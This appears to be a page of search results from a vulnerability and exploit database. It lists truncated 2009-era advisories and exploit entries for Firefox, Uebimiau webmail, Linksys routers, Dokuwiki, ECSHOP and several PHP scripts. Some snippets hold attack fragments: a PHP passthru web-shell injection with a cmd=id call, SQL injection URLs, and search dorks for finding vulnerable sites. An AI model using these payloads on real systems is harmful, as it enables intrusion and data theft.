3100 matches found
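Mozilla Firefox 'NPObject' Access Remote Code Execution Vulnerability
Bugtraq ID: 35360 CVE ID: CVE-2009-1837 CNCVE ID: CNCVE-20091837 Mozilla Firefox is an open-source web browser. A race condition exists when Mozilla Firefox accesses the private data of an NPObject JS wrapper class object; a remote attacker can exploit the vulnerability to execute arbitrary code with the privileges of the application. NPObjWrapperNewResolve has a race condition when accessing a property of an NPObject that wraps a JSObject; when loading Java...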
DB Top Sites 1.0 Remote Command Execution Exploit
Exploit for unknown platform in category web applications. DB Top Sites 1.0 Remote Command Execution Exploit ?php / + About DB Top Sites...
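'Compress::Raw::Zlib' Perl Module Remote Code Execution Vulnerability
Bugtraq ID: 35307 CVE ID: CVE-2009-1391 CNCVE ID: CNCVE-20091391 Compress::Raw::Zlib is a module that provides a low-level Perl interface to the Zlib compression library. Compress::Raw::Zlib inflate contains a buffer overflow; a remote attacker can exploit the vulnerability to crash the application or execute arbitrary code with the privileges of the application. The "inflate" function in Zlib.xs has an off-by-one error: processing specially crafted compressed data causes a heap buffer overflow, which can make the perl process hang or crash. Compress::Raw::Zlib 2.015 Compress::Raw::Zlib 2.014 Upgrade...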
Uebimiau Web-Mail 3.2.0-1.8 File Overwrite
Uebimiau Webmail After That Click Write To File Go /uebimiau/index.php?cmd=id See Pic :http://www.almlf.com/get-6-2009-almlfcomakszizl2.png Thanx To ...
Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
No description provided by source. Uebimiau Webmail = v3.2.0-1.8 Remote File / Overwrite Vulnerabilities Dork : Uebimiau Webmail v3.2.0-1.8 POC : /uebimiau/admin/editor.php?load=config And You Can Write Any Code As ?php passthru$GETcmd; ? After That Click Write To File Go /uebimiau/index.php?cmd=...
Uebimiau Web-Mail 3.2.0-1.8 - Remote File Overwrite
Uebimiau Web-Mail 3.2.0-1.8 - Remote File Overwrite Uebimiau Webmail After That Click Write To File Go /uebimiau/index.php?cmd=id See Pic :http://www.almlf.com/get-6-2009-almlfcomakszizl2.png Thanx To ...
mrcgiguy freeticket - Cookie Handling / SQL Injection
MRCGIGUY FreeTicket Multiple Remote Vulnerabilities Founder: ThE g0bL!N ------ Home: http:/www.4ckx.com/dz/ ---- Download: http://www.mrcgiguy.com/cgi-bin/freedown.cgi?id=1 Vendor:http://www.mrcgiguy.com Special Thx: Snakespc His0k4 Note: Algerie 3-1 Egypt Exploit: ------ Cookies insecure...
Virtue Shopping Mall (cid) Remote SQL Injection Vulnerability
No description provided by source. CMS : Virtue Shopping Mall WEB : http://www.virtuenetz.com/mall/ File : products.php Variable Type : GET value : cid Type : SQL Injection URL : http://www.site.com/products.php?cid=SQLI Exploit : ? $web = $argv1; $url =...
Virtue Shopping Mall - cid SQL Injection
Virtue Shopping Mall - cid SQL Injection CMS : Virtue Shopping Mall WEB : http://www.virtuenetz.com/mall/ File : products.php Variable Type : GET value : cid Type : SQL Injection URL : http://www.site.com/products.php?cid=SQLI Exploit : undersec@Undersec:/Escritorio$ php exploit.php...
Linksys WAG54G2 Web Management Console Arbitrary Command Exec
No description provided by source. 1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces. 2. When logged into web management console, it is possible to execute commands as root tested on firmware: V1.00.10. 3. PoC: GET...
ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities
No description provided by source...
Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability
No description provided by source. =By: Qabandi =Email: iqaahotmail.fr From Kuwait PEACE =Vuln: Traidnt Up version 2.0 Auth Bypass / Cookie SQL Injection Vulnerability =INFO: http://traidnt.net/vb/showthread.php?t=943260 =BUY: ---- =DORK: ----...
Evernew Free Joke Script 1.2 SQL Injection
taRentReXx The Indian Hacker @=Author : taRentReXx @=Email : [email protected] @=Script :...
Dokuwiki 2009-02-14 File Inclusion
Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit tested and working I was reading: http://www.milw0rm.com/exploits/8781 by girex quote It's not a RFI couse use of fileexists function. /quote How wrong brother! trick 1 ftp:// wrapper with php 5: needs registerglobals = on allowurlfopen ...
COWON America jetCast 2.0.4.1109 Overflow
?php / COWON America jetCast 2.0.4.1109 .mp3 local heap buffer overflow exploit xp/sp3 by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://www.jetaudio.com/ Tested against JetAudio pack v.7.5.2...
Gallarific - user.php Arbitrary Change Admin Information
Gallarific - user.php Arbitrary Change Admin Information gallarific exploit change password Founder : Email: Script: HOME hhttp://www.gallarific.com/ Note:after change password go to...
ECSHOP mall system: insufficient filtering leads to SQL injection vulnerability
Add time: 2009-05-25 System number: WAVDB-01431 Affected version: ECSHOP 2.6.1/2.6.2 Program description: ECSHOP is a free, open-source online store system. It is upgraded and maintained by a professional development team that provides timely and efficient technical support; you can also...
ZaoCMS (PhpCommander) - Arbitrary File Upload
=By: Qabandi =Email: iqaahotmail.fr From Kuwait PEACE =Vuln: ZaoCMS PhpCommander - Arbitrary File Upload =INFO: http://zaocms.com/ =BUY: http://zaocms.com/ =DORK: -- File-Upload-PoC Go to:...
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
Exploit for windows platform in category remote exploits. Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit patch. And the patch itself:...
OnlineRent 5.0 SQL Injection
OnlineRent v5.0 Remote SQL injection Author : UnderTaker HaCkEr Dork : © MY LTD 2008 . ALL RIGHTS RESERVED Dork2 : allintitle:V45 TEMPLATE Vendor :...